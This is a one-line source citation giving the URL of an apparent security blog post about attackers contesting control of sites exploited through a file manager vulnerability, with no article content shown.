Source: https://www.wordfence.com/blog/2020/09/attackers-fight-for-control-of-sites-targeted-in-file-manager-vulnerability/
